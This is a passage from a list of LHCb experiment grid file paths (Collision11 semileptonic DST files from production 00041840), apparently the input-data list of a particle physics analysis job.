'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054136_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063629_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027490_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058697_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001465_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011206_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065276_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026111_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017681_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068513_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033494_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038131_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014209_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042273_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001224_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019228_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035956_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006646_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007884_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026876_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003859_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036990_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013045_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030418_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030515_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031198_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000667_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039136_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061533_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003566_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052025_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015714_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044347_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032694_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069304_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004912_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011107_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018919_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045837_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031384_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053739_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001964_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001632_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006200_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029871_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059656_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005200_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042272_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004801_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034954_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004508_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043733_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051697_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005471_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002556_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043008_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037288_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039889_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035415_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056657_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059851_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053143_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067161_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049198_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055027_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060287_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050069_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066882_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027143_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040750_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043577_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035049_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045507_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053875_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030176_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059564_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022262_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067661_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063628_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031850_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015949_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011287_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013782_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018083_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066583_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013639_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003552_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066527_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061779_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012101_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003145_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045960_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004352_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034304_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028966_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058853_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027379_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069472_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032793_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002167_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050552_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066530_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033192_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009092_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018920_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047112_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049589_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044657_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036667_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006525_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032449_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034478_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067970_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053988_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027866_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012500_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053425_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054131_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007679_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050361_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004212_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063431_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031149_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069051_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005010_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061217_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002640_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019664_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039587_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002153_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040559_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041132_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014918_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023742_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060152_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049518_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000690_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024307_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015438_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060963_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006736_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000834_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039595_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011041_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042425_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046585_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064117_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001170_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029414_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051729_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052864_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010288_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018571_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018170_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006946_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066280_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020392_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050778_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038233_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025516_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033296_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044079_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000915_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045851_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014252_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038235_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013524_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036985_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011364_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032908_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051459_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044077_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042560_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028140_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027703_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027103_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050356_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040066_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010486_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054061_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014100_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017279_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033496_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042172_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031492_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012217_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028620_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034631_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067867_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059220_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037124_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013337_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057105_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047145_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063320_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055536_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003468_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035829_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031495_1.semileptonic.dst',
